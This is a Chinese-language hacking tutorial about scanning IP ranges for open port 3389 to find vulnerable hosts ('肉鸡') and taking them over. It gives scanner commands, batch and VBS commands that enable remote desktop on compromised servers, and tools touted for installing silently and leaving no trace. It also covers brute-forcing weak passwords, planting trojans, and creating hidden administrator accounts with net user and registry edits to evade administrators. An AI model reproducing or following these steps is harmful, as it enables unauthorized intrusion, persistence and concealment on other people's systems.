3389扫描器,S扫描器(IP扫描器)怎么使用
本文目录索引
1,S扫描器(IP扫描器)怎么使用
打开S扫描器,下面举几个例子演示下S扫描器的主要几个作用。
例子一:
S TCP 218.80.12.1 218.80.12.123 80 512
TCP扫描218.80.12.1到218.80.12.123这IP段中的80端口,最大并发线程是512)
例子二:
S TCP 218.80.12.1 218.80.12.123 21,5631 512 /Banner
TCP扫描218.80.12.1到218.80.12.123这IP段中的21和5631端口,最大并发线程是512,并显示Banner
例子三:
S TCP 218.80.12.1 218.80.12.12 1-200 5128
TCP扫描218.80.12.1到218.80.12.12这IP段中的1到200端口,最大并发线程是512
例子四:
S TCP 218.80.12.7 1-200 512
TCP扫描218.80.12.7这IP中的1到200端口,最大并发线程是512
例子五:
S SYN 218.80.12.7 1-65535 /Save
SYN扫描218.80.12.7这IP中的1到65535端口,将结果写入Result.txt
扫描结束后Result.txt就存放在你的S扫描器所在的硬盘里,就是这个文档。刚才扫描的东西都在里面。
例子六:
S SYN 218.80.12.1 218.80.12.255 21 /Save
TCP扫描218.80.12.1到218.80.12.255这IP段中的21端口,将结果写入Result.txt
这个重点说明一下,因为这条命令就是专门用来找肉鸡的,扫描一个IP段有没有开3389的或1433的。
下面是介绍:
1、示范下:S SYN 218.80.1.1 218.80.255.255 3389 /Save (找开放3389肉鸡的指令,矮鸟要牢记哦),好多开了3389的,大家只要利用这指令扫到开3389的IP,再用别工具继续扫开了3389的肉鸡的弱口令,
2、找到了马上建立管理员,登陆进去,就算得到一个肉鸡了,由于不是教找肉鸡的,也不进行操作。
注意:
1、SYN扫描是很依赖于扫描者和被扫描者的网速的,如果是内网的系统,那不一定可以使用SYN扫描的。
因为网关的类型会决定内网系统是否能进行SYN扫描.如果配置较低的话,也不推荐使用SYN扫描。SYN扫描速度是比TCP扫描的速度快很多的,但在稳定性方面却不是太好,所以自己决定使用哪种模式进行扫描。
2、SYN扫描不需要线程那个参数,请看上面例子5和6;
3、TCP扫描的最大并发线程不能超过1024;
4、使用SYN模式扫描,不能扫描Banner,具体为什么不能,请查看有关SYN的资料。
对于有些朋友说XP-SP2不能用S扫描器,有的说可以使用,这里看来在这样的系统下也能使用,不过 是使用TCP 这种方法。
2,求个快速3389端口扫描器!
自做弱口令扫描器打开3389端口的四种方法
一、打开记事本,编辑内容如下:
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。
二、 脚本文件本地打开3389端口(适用于win2000\xp)
工具:rots1.05
地址:www.netsill.com/rots.zip
使用方法:
在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:
c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
服务端口: 设置终端服务的服务端口。默认是3389。
自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。(如果/r不行,可以试试这个)
使用此参数时,端口设置不能忽略。
比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空
运行CMD(2000下的DOS),我们给它开终端!
命令如下!
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)
脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
因为pro版不能安装终端服务。
如果你确信脚本判断错误,就继续安装好了。
如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。
脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。
三、下载3389自动安装程序-djshao正式版5.0
地址www.netsill.com/djshao.zip
说明:解压djshao5.0.zip,把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入c:\winnt\temp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务!
特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径
2、在后台安静模式运行,就算肉鸡旁有人也没有关系!
3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩
4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件!
5、不管肉鸡的winnt装在什么盘上都无所谓!
6、安装完终端后会删除在管理工具中的终端快捷图标!
7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。
8、自动检测肉鸡是不是服务器版,如果不是,删除原文件,不执行安装,如果是服务器版就执行安装!
9、支持中日韩繁四个版本的win2000服务器版!
四、下载DameWare NT Utilities 3.66.0.0 注册版
地址www.netsill.com/dwmrcw36600.zip
安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。
复制启动后出现对方桌面。
在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK
3,S扫描器扫到开3389端口的主机后,怎么添加用户,提权?
3389 扫到不是很难。要知道它的用户名和密码才可以。知道了他的IP可以使用“流光”暴力破解。但是那软件只支持WIN2000 有点年纪。但是效果还可以。主要是看你的暴力词典。对方密码简单几率92%~93%,如果是字母+数字 字母大小写 还加特殊符号的密码几率基本是0。看你运气了。得到了密码,最好远程马上上马。开启23端口。远程也可以但是太麻烦不方便。万一对方远程过来你弹出去就露馅了。当然木马免杀。运用TELNET 先建立个用户名 例如:net user 123$ 123456 /add 这个是个普通用户马上提权为管理员 net localgroup administrators 123$ /add 123后面加$ 可以防止一些粗心的管理员使用 net user 查看。但是 在用户账户或者是计算机组里面是可以看见的 现在好多控制端支持远程修改对方的注册表 所以你可以通过修改对方的注册表彻底 隐藏掉管理员账号。当然进去的时候在服务端通过远程屏幕查看对方当时是不是在使用 因为最后是要上传个.REG的注册表文件导入。防止高警觉的管理员发现。